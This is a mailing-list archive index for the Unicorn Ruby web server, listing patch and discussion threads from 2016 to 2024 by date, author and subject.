2016-10-31 23:36  3% ` Eric Wong
2016-11-01  8:21  0%   ` Sam Saffron
2016-11-07 17:13  2% Build error of 5.1.0 due to RString Olivier FAURAX
2016-11-29  0:00  6% [RFC] TUNING: document THP caveat for Linux users Eric Wong
2017-02-21 19:19     Patch: Add after_worker_exit configuration option Jeremy Evans
2017-02-21 19:43  3% ` Eric Wong
2017-02-21 20:02  0%   ` Jeremy Evans
2017-02-21 19:24     Patch: Add support for chroot to Worker#user Jeremy Evans
2017-02-21 19:53     ` Eric Wong
2017-02-21 20:15  3%   ` Jeremy Evans
2017-02-22 12:02     check_client_connection using getsockopt(2) Simon Eskildsen
2017-02-22 18:33  2% ` Eric Wong
2017-02-22 20:09  2%   ` Simon Eskildsen
2017-02-23  1:42  2%     ` Eric Wong
2017-02-23  2:42  0%       ` Simon Eskildsen
2017-02-23  3:52  2%         ` Eric Wong
2017-02-23  0:49     Patch: Add after_worker_ready configuration option Jeremy Evans
2017-02-23  2:32     ` Eric Wong
2017-02-23  3:43  1%   ` Jeremy Evans
2017-02-23  9:23  2%     ` Eric Wong
2017-02-23 20:00  0%       ` Jeremy Evans
2017-02-25 14:03     [PATCH] check_client_connection: use tcp state on linux Simon Eskildsen
2017-02-25 16:19     ` Simon Eskildsen
2017-02-25 23:12       ` Eric Wong
2017-02-27 11:44         ` Simon Eskildsen
2017-02-28 21:12           ` Eric Wong
2017-03-01  3:18             ` Eric Wong
2017-03-06 21:32               ` Simon Eskildsen
2017-03-07 22:50                 ` Eric Wong
2017-03-08  0:26                   ` Eric Wong
2017-03-08 12:06                     ` Simon Eskildsen
2017-03-13 20:16  3%                   ` Simon Eskildsen
2017-03-08 18:44     [PATCH] Add worker_exec configuration option Jeremy Evans
2017-03-08 20:02     ` Eric Wong
2017-03-09 19:41       ` [PATCH] Add worker_exec configuration option V2 Jeremy Evans
2017-03-10 21:19         ` Eric Wong
2017-03-11  5:26           ` Jeremy Evans
2017-03-11  7:18  3%         ` Eric Wong
     [not found]     <20170316031652.17433-1-e@80x24.org>
2017-03-21  2:55  5% ` [PATCH (ccc)] http_request: support proposed Raindrops::TCP states on Eric Wong
2017-03-24 20:03  2% [PATCH] Check for SocketError on first ccc attempt Jeremy Evans
2017-04-04 14:08     after_worker_exit on murder Simon Eskildsen
2017-04-04 14:32  3% ` Jeremy Evans
2017-08-07 20:18     Random crash when sending USR2 + QUIT signals to Unicorn process Eric Wong
2017-10-03 14:52  3% ` Xuanzhong Wei
2017-10-03 17:15  0%   ` Eric Wong
2017-10-03 18:20  4%     ` Xuanzhong Wei
2017-10-19 17:42  4% Reaping process with unknown worker Alberto De Gaspari
2017-10-19 18:20  0% ` Eric Wong
2017-10-19 18:46       ` Alberto De Gaspari
2017-10-19 19:05         ` Eric Wong
2017-10-19 19:23  3%       ` Alberto De Gaspari
2017-10-19 19:37  0%         ` Eric Wong
2018-02-24  8:48  4% [PATCH] Send SIGTERM before SIGKILL on timeout Fumiaki MATSUSHIMA
2018-09-13 19:24     Make Worker#user support different process primary group and log file group Jeremy Evans
2018-09-13 22:53  3% ` Eric Wong
2018-11-07 23:38  2% [PATCH] doc: update more URLs to use HTTPS and avoid redirects Eric Wong
2018-12-13  1:07  6% [PATCH] doc/ISSUES: add links to git clone-able mail archives of our dependencies Eric Wong
     [not found]     <E5E85D7F-061C-422C-B02E-8FC248F87986@southofheaven.org>
     [not found]     ` <20190110200102.GA14520@portux.naturalnet.de>
2019-01-10 20:28       ` Bug#918916: Unicorn not reporting proper version for gemfile? Eric Wong
2019-01-12  9:42  3%     ` Hleb Valoshka
2019-01-12 10:04  0%       ` Dominik George
2019-03-06  1:47     Issues after 5.5.0 upgrade Stan Pitucha
2019-03-06  2:48     ` Eric Wong
2019-03-06  4:07       ` Stan Pitucha
2019-03-06  4:44         ` Eric Wong
2019-03-06  5:57  2%       ` Jeremy Evans
2019-05-12 22:25     [PATCH 0/3] slow clients and test/benchmark tools Eric Wong
2019-05-12 22:25  5% ` [PATCH 3/3] test/benchmark/uconnect: test for accept loop speed Eric Wong
2019-12-16 22:34  2% Traffic priority with Unicorn Bertrand Paquet
2019-12-17  5:12  0% ` Eric Wong
2019-12-18 22:06  0%   ` Bertrand Paquet
2020-01-14  7:46     [PATCH] doc: s/bogomips.org/yhbt.net/g Eric Wong
2020-01-14  7:46  1% ` Eric Wong
2020-08-06 21:46     Can Unicorn utilize HTTPS? Keven Sticher
2020-08-06 21:54  4% ` Eric Wong
2020-08-18 15:15     Connection issues between nginx and unicorn Michael Bernstein
2020-08-18 18:06  2% ` Eric Wong
2020-09-01 12:17     [PATCH] Update ruby_version requirement to allow ruby 3.0 Jean Boussier
2020-09-01 14:48     ` Eric Wong
2020-09-01 15:04       ` Jean Boussier
2020-09-01 15:41         ` Eric Wong
2020-09-03  7:52           ` Jean Boussier
2020-09-03  8:25             ` Eric Wong
2020-09-03  8:29               ` Jean Boussier
2020-09-03  9:31                 ` Eric Wong
2020-09-03 11:23  3%               ` Jean Boussier
2020-09-04 12:34                     ` Jean Boussier
2020-09-06  9:30                       ` Eric Wong
2020-09-07  7:13                         ` Jean Boussier
2020-09-08  2:24                           ` Eric Wong
2020-09-08  8:00                             ` Jean Boussier
2020-09-08  8:50  3%                           ` Eric Wong
2020-11-26 11:59     [RFC] http_response: ignore invalid header response characters Eric Wong
2021-01-06 17:53  2% ` Eric Wong
2021-01-13 23:20  1%   ` Sam Sanoop
2020-12-24 20:40  7% [PATCH] build: publish_doc: remove created.rid and index.html from site Eric Wong
     [not found]     <F6712BF3-A4DD-41EE-8252-B9799B35E618@github.com>
     [not found]     ` <20210311030250.GA1266@dcvr>
     [not found]       ` <7F6FD017-7802-4871-88A3-1E03D26D967C@github.com>
2021-03-12  9:41  1%     ` Potential Unicorn vulnerability Eric Wong
2021-03-13  2:08  3% [PATCH] test/test_helper: only unlink redirected logs from parent Eric Wong
2021-07-06  7:22  2% Formatting unicorn logs in json format for $stderr Cenon Del Rosario
2021-07-06 10:41  0% ` Eric Wong
2021-07-06 23:21  0%   ` Cenon Del Rosario
2021-10-01  3:09     [PATCH 0/6] reduce thundering herds on Linux 4.5+ Eric Wong
2021-10-01  3:09  1% ` [PATCH 6/6] use EPOLLEXCLUSIVE " Eric Wong
2021-12-25 17:41  3% [PATCH 0/3] Ruby 3.1 + doc/URL updates Eric Wong
2022-01-23 16:10  4% Memory usage enhancement in unicorn 6.1? Toshimaru Enomoto
2022-02-16 22:39  0% ` Eric Wong
2022-05-08  3:47     DKIM+DMARC enabled (for mailing list subscribers) Eric Wong
2022-06-22  8:44  3% ` Eric Wong
2022-07-05 20:05     [PATCH] Master promotion with SIGURG (CoW optimization) Jean Boussier
2022-07-06  2:33  2% ` Eric Wong
2022-07-06  7:40  1%   ` Jean Boussier
2022-07-07 10:23  0%     ` Eric Wong
     [not found]           ` <CANPRWbHTNiEcYq5qhN6Kio8Wg9a+2gXmc2bAcB2oVw4LZv8rcw@mail.gmail.com>
2022-07-08  0:30             ` Eric Wong
2022-07-08  6:22  2%           ` Jean Boussier
2022-09-21 22:16  0%             ` Eric Wong
2022-07-08 13:17  2% [PATCH] Get rid of Kgio Jean Boussier
2023-05-06 22:02     unicorn worker being killed issue subashkc1
2023-05-07 23:13     ` Eric Wong
2023-05-10 21:34  2%   ` subashkc1
2023-06-01 18:54     Rack 3 Compatibility Jeremy Evans
2023-06-02  0:00     ` Eric Wong
2023-06-02  2:45       ` Jeremy Evans
2023-06-05  9:12  3%     ` [PATCH v2] chunk unterminated HTTP/1.1 responses for Rack 3.1 Eric Wong
2023-06-05 10:32  1% [PATCH 00-23/23] start porting tests to Perl5 Eric Wong
2023-06-20 10:46  3% [PATCH] unicorn_http_common.rl: use only ASCII spaces for compatibility EW
2023-06-20 12:28  1% [PATCH] add chunk_response config directive " EW
2023-09-05  9:44  2% [RFC 0-3/3] depend on Ruby 2.5+, eliminate kgio Eric Wong
2024-03-23 19:45  4% [PATCH 0/4] a small pile of patches Eric Wong
2024-05-06 20:10  1% [PATCH 0/5..5/5] more tests to Perl 5 for stability Eric Wong

Code repositories for project(s) associated with this public inbox

	https://yhbt.net/unicorn.git/

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for read-only IMAP folder(s) and NNTP newsgroup(s).